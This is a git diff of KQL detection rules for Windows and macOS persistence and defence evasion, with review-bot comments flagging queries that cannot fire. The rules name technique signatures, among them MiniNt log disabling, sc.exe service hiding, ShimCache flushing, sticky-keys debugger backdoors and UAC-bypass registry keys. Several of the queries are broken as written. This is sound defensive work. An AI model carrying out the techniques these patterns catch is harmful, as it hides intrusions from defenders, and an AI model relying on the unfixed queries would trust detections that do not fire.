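Review bot: `RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin"` folds the value name into the key path, but DeviceRegistryEvents reports the key and the value name in separate columns (RegistryKey and RegistryValueName), so this match is unlikely ever to fire. Suggested: `| where RegistryKey endswith "\\Control\\Lsa" and RegistryValueName =~ "DisableRestrictedAdmin"`. The same key/value-name conflation appears in the `\StubPath` suffix of the Run Once Task Configuration hunk, the `\(Default)` suffix of the MiniNt Registry Set hunk, the `\ImagePath` and `\Start` suffixes of the Service Binary hunk, the `\Parameters\ServiceDll` suffix of the ServiceDll Hijack hunk and the `SymbolicLinkValue`, `DelegateExecute` and `(Default)` suffixes of the Shell Open hunk; the fix is the same in each.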
@@ -1,12 +1,12 @@
-// Title: RestrictedAdminMode Registry Value Tampering - ProcCreation
-// Author: frack113
-// Date: 2023-01-13
-// Level: high
-// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
-// RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
-// This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceProcessEvents
+// Title: RestrictedAdminMode Registry Value Tampering - ProcCreation
+// Author: frack113
+// Date: 2023-01-13
+// Level: high
+// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
+// RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
+// This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "DisableRestrictedAdmin"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/run_once_task_configuration_in_registry.kql b/KQL/rules/Persistence/run_once_task_configuration_in_registry.kql
index 22fa6a98..157fc1b0 100644
--- a/KQL/rules/Persistence/run_once_task_configuration_in_registry.kql
+++ b/KQL/rules/Persistence/run_once_task_configuration_in_registry.kql
@@ -1,12 +1,12 @@
-// Title: Run Once Task Configuration in Registry
-// Author: Avneet Singh @v3t0_, oscd.community
-// Date: 2020-11-15
-// Level: medium
-// Description: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-// False Positives:
-// - Legitimate modification of the registry key by legitimate program
-
-DeviceRegistryEvents
+// Title: Run Once Task Configuration in Registry
+// Author: Avneet Singh @v3t0_, oscd.community
+// Date: 2020-11-15
+// Level: medium
+// Description: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate modification of the registry key by legitimate program
+
+DeviceRegistryEvents
 | where (RegistryKey contains "\\Microsoft\\Active Setup\\Installed Components" and RegistryKey endswith "\\StubPath") and (not(((RegistryValueData contains "C:\\Program Files\\Google\\Chrome\\Application\\" and RegistryValueData contains "\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level") or ((RegistryValueData contains "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\" or RegistryValueData contains "C:\\Program Files\\Microsoft\\Edge\\Application\\") and RegistryValueData endswith "\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/run_once_task_execution_as_configured_in_registry.kql b/KQL/rules/Persistence/run_once_task_execution_as_configured_in_registry.kql
index d4510f26..2afb89e2 100644
--- a/KQL/rules/Persistence/run_once_task_execution_as_configured_in_registry.kql
+++ b/KQL/rules/Persistence/run_once_task_execution_as_configured_in_registry.kql
@@ -1,10 +1,10 @@
-// Title: Run Once Task Execution as Configured in Registry
-// Author: Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)
-// Date: 2020-10-18
-// Level: low
-// Description: This rule detects the execution of Run Once task as configured in the registry
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceProcessEvents
+// Title: Run Once Task Execution as Configured in Registry
+// Author: Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)
+// Date: 2020-10-18
+// Level: low
+// Description: This rule detects the execution of Run Once task as configured in the registry
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/AlternateShellStartup" or ProcessCommandLine endswith "/r") and (FolderPath endswith "\\runonce.exe" or ProcessVersionInfoFileDescription =~ "Run Once Wrapper")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql
index 40bb3976..6d91c21e 100644
--- a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql
+++ b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql
@@ -1,14 +1,14 @@
-// Title: Security Event Logging Disabled via MiniNt Registry Key - Process
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-04-09
-// Level: high
-// Description: Detects attempts to disable security event logging by adding the `MiniNt` registry key.
-// This key is used to disable the Windows Event Log service, which collects and stores event logs from the operating system and applications.
-// Adversaries may want to disable this service to prevent logging of security events that could be used to detect their activities.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1562.002, attack.t1112, car.2022-03-001
-// False Positives:
-// - Highly Unlikely
-
-DeviceProcessEvents
+// Title: Security Event Logging Disabled via MiniNt Registry Key - Process
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-09
+// Level: high
+// Description: Detects attempts to disable security event logging by adding the `MiniNt` registry key.
+// This key is used to disable the Windows Event Log service, which collects and stores event logs from the operating system and applications.
+// Adversaries may want to disable this service to prevent logging of security events that could be used to detect their activities.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1562.002, attack.t1112, car.2022-03-001
+// False Positives:
+// - Highly Unlikely
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\MiniNt") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or ((ProcessCommandLine contains "New-Item " or ProcessCommandLine contains "ni ") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\MiniNt" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql
index af522520..68a7bdb7 100644
--- a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql
+++ b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql
@@ -1,14 +1,14 @@
-// Title: Security Event Logging Disabled via MiniNt Registry Key - Registry Set
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-04-09
-// Level: high
-// Description: Detects the addition of the 'MiniNt' key to the registry. Upon a reboot, Windows Event Log service will stop writing events.
-// Windows Event Log is a service that collects and stores event logs from the operating system and applications. It is an important component of Windows security and auditing.
-// Adversary may want to disable this service to disable logging of security events which could be used to detect their activities.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1562.002, attack.t1112, car.2022-03-001
-// False Positives:
-// - Highly Unlikely
-
-DeviceRegistryEvents
+// Title: Security Event Logging Disabled via MiniNt Registry Key - Registry Set
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-09
+// Level: high
+// Description: Detects the addition of the 'MiniNt' key to the registry. Upon a reboot, Windows Event Log service will stop writing events.
+// Windows Event Log is a service that collects and stores event logs from the operating system and applications. It is an important component of Windows security and auditing.
+// Adversary may want to disable this service to disable logging of security events which could be used to detect their activities.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1562.002, attack.t1112, car.2022-03-001
+// False Positives:
+// - Highly Unlikely
+
+DeviceRegistryEvents
 | where RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Control\\MiniNt\\(Default)"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/service_binary_in_suspicious_folder.kql b/KQL/rules/Persistence/service_binary_in_suspicious_folder.kql
index 6274aaec..55e28560 100644
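Review bot: The key path `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Control\\MiniNt\\(Default)` exists in no form on a real host: the registry exposes `CurrentControlSet` or `ControlSet001`, never the hybrid, and `(Default)` is a value name rather than a key component. The rule describes key addition, yet an exact `=~` match only sees an event whose RegistryKey is exactly this string, so a key-creation event for `...\Control\MiniNt` would be missed. Suggested: `| where ActionType =~ "RegistryKeyCreated" and RegistryKey endswith "\\Control\\MiniNt"`; the same `CurrentControlSet001` spelling recurs in the Service Binary hunk, so the ControlSet form the tenant actually reports should be confirmed once and applied to both.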
--- a/KQL/rules/Persistence/service_binary_in_suspicious_folder.kql
+++ b/KQL/rules/Persistence/service_binary_in_suspicious_folder.kql
@@ -1,10 +1,10 @@
-// Title: Service Binary in Suspicious Folder
-// Author: Florian Roth (Nextron Systems), frack113
-// Date: 2022-05-02
-// Level: high
-// Description: Detect the creation of a service with a service binary located in a suspicious directory
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceRegistryEvents
+// Title: Service Binary in Suspicious Folder
+// Author: Florian Roth (Nextron Systems), frack113
+// Date: 2022-05-02
+// Level: high
+// Description: Detect the creation of a service with a service binary located in a suspicious directory
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
 | where (((RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Perflogs\\" or RegistryValueData contains "\\ADMIN$\\" or RegistryValueData contains "\\Temp\\") and RegistryKey endswith "\\ImagePath" and RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services*") or ((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "DWORD (0x00000002)")) and (InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Perflogs\\" or InitiatingProcessFolderPath contains "\\ADMIN$\\" or InitiatingProcessFolderPath contains "\\Temp\\") and RegistryKey endswith "\\Start" and RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services*")) and (not(((InitiatingProcessFolderPath contains "\\Common Files\\" and InitiatingProcessFolderPath contains "\\Temp\\") or (RegistryValueData endswith "\\AppData\\Local\\Temp\\MBAMInstallerService.exe\"" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\services.exe" and RegistryKey endswith "\\CurrentControlSet\\Services\\MBAMInstallerService\\ImagePath"))))
\ No newline at end of file
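Review bot: `RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services*"` is an exact (case-insensitive) equality against a string containing a literal `*`, and it is ANDed with `RegistryKey endswith "\\ImagePath"` (and with `"\\Start"` in the second branch), so the two conditions can never hold at once and the rule matches nothing. The source rule presumably used a wildcard prefix, which in KQL is `startswith`. Suggested, in both branches: `RegistryKey startswith "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\"` (confirm the ControlSet spelling the tenant reports), with ImagePath and Start tested through RegistryValueName. The `DWORD (0x0000000N)` literals in the second branch are Sysmon's display format and may not match how RegistryValueData renders DWORDs — verify against a known Start-value event.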
diff --git a/KQL/rules/Persistence/service_dacl_abuse_to_hide_services_via_sc_exe.kql b/KQL/rules/Persistence/service_dacl_abuse_to_hide_services_via_sc_exe.kql
index 4d64c17b..c32f37b9 100644
--- a/KQL/rules/Persistence/service_dacl_abuse_to_hide_services_via_sc_exe.kql
+++ b/KQL/rules/Persistence/service_dacl_abuse_to_hide_services_via_sc_exe.kql
@@ -1,10 +1,10 @@
-// Title: Service DACL Abuse To Hide Services Via Sc.EXE
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021-12-20
-// Level: high
-// Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
-
-DeviceProcessEvents
+// Title: Service DACL Abuse To Hide Services Via Sc.EXE
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2021-12-20
+// Level: high
+// Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "DCLCWPDTSD") and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/service_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/Persistence/service_security_descriptor_tampering_via_sc_exe.kql
index c6a06180..a6c459f6 100644
--- a/KQL/rules/Persistence/service_security_descriptor_tampering_via_sc_exe.kql
+++ b/KQL/rules/Persistence/service_security_descriptor_tampering_via_sc_exe.kql
@@ -1,10 +1,10 @@
-// Title: Service Security Descriptor Tampering Via Sc.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-28
-// Level: medium
-// Description: Detection of sc.exe utility adding a new service with special permission which hides that service.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
-
-DeviceProcessEvents
+// Title: Service Security Descriptor Tampering Via Sc.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-28
+// Level: medium
+// Description: Detection of sc.exe utility adding a new service with special permission which hides that service.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "sdset" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/servicedll_hijack.kql b/KQL/rules/Persistence/servicedll_hijack.kql
index 0ebe5ce0..372f8f5f 100644
--- a/KQL/rules/Persistence/servicedll_hijack.kql
+++ b/KQL/rules/Persistence/servicedll_hijack.kql
@@ -1,14 +1,14 @@
-// Title: ServiceDll Hijack
-// Author: frack113
-// Date: 2022-02-04
-// Level: medium
-// Description: Detects changes to the "ServiceDLL" value related to a service in the registry.
-// This is often used as a method of persistence.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
-// False Positives:
-// - Administrative scripts
-// - Installation of a service
-
-DeviceRegistryEvents
+// Title: ServiceDll Hijack
+// Author: frack113
+// Date: 2022-02-04
+// Level: medium
+// Description: Detects changes to the "ServiceDLL" value related to a service in the registry.
+// This is often used as a method of persistence.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+// - Administrative scripts
+// - Installation of a service
+
+DeviceRegistryEvents
 | where ((RegistryKey endswith "\\System*" and RegistryKey contains "ControlSet" and RegistryKey endswith "\\Services*") and RegistryKey endswith "\\Parameters\\ServiceDll") and (not(((RegistryValueData =~ "%%systemroot%%\\system32\\ntdsa.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe" and RegistryKey endswith "\\Services\\NTDS\\Parameters\\ServiceDll") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" or RegistryValueData =~ "C:\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll"))) and (not((RegistryValueData =~ "C:\\Windows\\System32\\STAgent.dll" and InitiatingProcessFolderPath endswith "\\regsvr32.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/shell_open_registry_keys_manipulation.kql b/KQL/rules/Persistence/shell_open_registry_keys_manipulation.kql
index b774d693..24917ebc 100644
--- a/KQL/rules/Persistence/shell_open_registry_keys_manipulation.kql
+++ b/KQL/rules/Persistence/shell_open_registry_keys_manipulation.kql
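Review bot: `RegistryKey endswith "\\System*"` and `RegistryKey endswith "\\Services*"` treat `*` as a literal character and are ANDed with `RegistryKey endswith "\\Parameters\\ServiceDll"`, so three mutually exclusive suffix tests leave the rule unsatisfiable. The surviving `contains "ControlSet"` term in the middle suggests the source expressed all three as substring matches, which is presumably what was intended here. Suggested: `RegistryKey contains "\\System" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Services" and RegistryKey endswith "\\Parameters" and RegistryValueName =~ "ServiceDll"`. The `%%systemroot%%` literal in the NTDS exclusion should also be checked against a real lsass.exe event, since the doubled percent signs look like a Sysmon rendering rather than the value MDE records.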
@@ -1,10 +1,10 @@
-// Title: Shell Open Registry Keys Manipulation
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021-08-30
-// Level: high
-// Description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1546.001
-
-DeviceRegistryEvents
+// Title: Shell Open Registry Keys Manipulation
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1546.001
+
+DeviceRegistryEvents
 | where (RegistryValueData contains "\\Software\\Classes\\{" and ActionType =~ "RegistryValueSet" and RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\SymbolicLinkValue") or RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\DelegateExecute" or ((ActionType =~ "RegistryValueSet" and (RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\(Default)" or RegistryKey endswith "Classes\\exefile\\shell\\open\\command\\(Default)")) and (not(RegistryValueData =~ "(Empty)")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/shimcache_flush.kql b/KQL/rules/Persistence/shimcache_flush.kql
index ad06b4b2..c8409337 100644
--- a/KQL/rules/Persistence/shimcache_flush.kql
+++ b/KQL/rules/Persistence/shimcache_flush.kql
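Review bot: `not(RegistryValueData =~ "(Empty)")` carries over a Sysmon display sentinel; DeviceRegistryEvents most likely records an unset value as an empty string rather than the text `(Empty)`, so this exclusion removes nothing and the `(Default)` branch fires on the empty writes it was meant to ignore — worth confirming on a live event before changing. Suggested: `and isnotempty(RegistryValueData)` in place of the `not(...)` clause. The three suffixes `SymbolicLinkValue`, `DelegateExecute` and `(Default)` are value names and belong in RegistryValueName rather than on the end of RegistryKey, with the key tests reduced to `endswith "Classes\\ms-settings\\shell\\open\\command"` and `endswith "Classes\\exefile\\shell\\open\\command"`.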
@@ -1,10 +1,10 @@
-// Title: ShimCache Flush
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-02-01
-// Level: high
-// Description: Detects actions that clear the local ShimCache and remove forensic evidence
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceProcessEvents
+// Title: ShimCache Flush
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-02-01
+// Level: high
+// Description: Detects actions that clear the local ShimCache and remove forensic evidence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "apphelp.dll") and (ProcessCommandLine contains "ShimFlushCache" or ProcessCommandLine contains "#250")) or ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "kernel32.dll") and (ProcessCommandLine contains "BaseFlushAppcompatCache" or ProcessCommandLine contains "#46"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/startup_item_file_created_macos.kql b/KQL/rules/Persistence/startup_item_file_created_macos.kql
index c1543493..3b979933 100644
--- a/KQL/rules/Persistence/startup_item_file_created_macos.kql
+++ b/KQL/rules/Persistence/startup_item_file_created_macos.kql
@@ -1,14 +1,14 @@
-// Title: Startup Item File Created - MacOS
-// Author: Alejandro Ortuno, oscd.community
-// Date: 2020-10-14
-// Level: low
-// Description: Detects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence.
-// Adversaries may use startup items automatically executed at boot initialization to establish persistence.
-// Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1037.005
-// False Positives:
-// - Legitimate administration activities
-
-DeviceFileEvents
+// Title: Startup Item File Created - MacOS
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-14
+// Level: low
+// Description: Detects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence.
+// Adversaries may use startup items automatically executed at boot initialization to establish persistence.
+// Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1037.005
+// False Positives:
+// - Legitimate administration activities
+
+DeviceFileEvents
 | where FolderPath endswith ".plist" and (FolderPath startswith "/Library/StartupItems/" or FolderPath startswith "/System/Library/StartupItems")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_aspx_file_drop_by_exchange.kql b/KQL/rules/Persistence/suspicious_aspx_file_drop_by_exchange.kql
index dafc5327..7399237b 100644
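Review bot: The query reads DeviceFileEvents without an ActionType restriction, so it also fires on modification, rename and deletion of the same plist files although the title and description describe creation only. Suggested: `| where ActionType =~ "FileCreated" and FolderPath endswith ".plist" and (FolderPath startswith "/Library/StartupItems/" or FolderPath startswith "/System/Library/StartupItems")`. The second prefix lacks the trailing `/` the first one has, which is harmless but inconsistent.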
--- a/KQL/rules/Persistence/suspicious_aspx_file_drop_by_exchange.kql
+++ b/KQL/rules/Persistence/suspicious_aspx_file_drop_by_exchange.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious ASPX File Drop by Exchange
-// Author: Florian Roth (Nextron Systems), MSTI (query, idea)
-// Date: 2022-10-01
-// Level: high
-// Description: Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1505.003
-
-DeviceFileEvents
+// Title: Suspicious ASPX File Drop by Exchange
+// Author: Florian Roth (Nextron Systems), MSTI (query, idea)
+// Date: 2022-10-01
+// Level: high
+// Description: Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003
+
+DeviceFileEvents
 | where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe" and (FolderPath contains "FrontEnd\\HttpProxy\\" or FolderPath contains "\\inetpub\\wwwroot\\aspnet_client\\")) and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_chromium_browser_instance_executed_with_custom_extension.kql b/KQL/rules/Persistence/suspicious_chromium_browser_instance_executed_with_custom_extension.kql
index a3e73e24..b280e656 100644
--- a/KQL/rules/Persistence/suspicious_chromium_browser_instance_executed_with_custom_extension.kql
+++ b/KQL/rules/Persistence/suspicious_chromium_browser_instance_executed_with_custom_extension.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Chromium Browser Instance Executed With Custom Extension
-// Author: Aedan Russell, frack113, X__Junior (Nextron Systems)
-// Date: 2022-06-19
-// Level: high
-// Description: Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1176.001
-
-DeviceProcessEvents
+// Title: Suspicious Chromium Browser Instance Executed With Custom Extension
+// Author: Aedan Russell, frack113, X__Junior (Nextron Systems)
+// Date: 2022-06-19
+// Level: high
+// Description: Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1176.001
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "--load-extension=" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_debugger_registration_cmdline.kql b/KQL/rules/Persistence/suspicious_debugger_registration_cmdline.kql
index 0587ee17..4082a334 100644
--- a/KQL/rules/Persistence/suspicious_debugger_registration_cmdline.kql
+++ b/KQL/rules/Persistence/suspicious_debugger_registration_cmdline.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Debugger Registration Cmdline
-// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
-// Date: 2019-09-06
-// Level: high
-// Description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.008
-
-DeviceProcessEvents
+// Title: Suspicious Debugger Registration Cmdline
+// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
+// Date: 2019-09-06
+// Level: high
+// Description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.008
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\CurrentVersion\\Image File Execution Options\\" and (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "magnify.exe" or ProcessCommandLine contains "narrator.exe" or ProcessCommandLine contains "displayswitch.exe" or ProcessCommandLine contains "atbroker.exe" or ProcessCommandLine contains "HelpPane.exe")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql b/KQL/rules/Persistence/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql
index bc22f733..ab80b0ba 100644
--- a/KQL/rules/Persistence/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql
+++ b/KQL/rules/Persistence/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious File Creation Activity From Fake Recycle.Bin Folder
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-07-12
-// Level: high
-// Description: Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion
-
-DeviceFileEvents
+// Title: Suspicious File Creation Activity From Fake Recycle.Bin Folder
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-12
+// Level: high
+// Description: Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath contains "RECYCLERS.BIN\\" or InitiatingProcessFolderPath contains "RECYCLER.BIN\\") or (FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/suspicious_file_drop_by_exchange.kql b/KQL/rules/Persistence/suspicious_file_drop_by_exchange.kql
index 14be4920..a30d927a 100644
--- a/KQL/rules/Persistence/suspicious_file_drop_by_exchange.kql
+++ b/KQL/rules/Persistence/suspicious_file_drop_by_exchange.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious File Drop by Exchange
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-10-04
-// Level: medium
-// Description: Detects suspicious file type dropped by an Exchange component in IIS
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1190, attack.initial-access, attack.t1505.003
-
-DeviceFileEvents
+// Title: Suspicious File Drop by Exchange
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-04
+// Level: medium
+// Description: Detects suspicious file type dropped by an Exchange component in IIS
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1190, attack.initial-access, attack.t1505.003
+
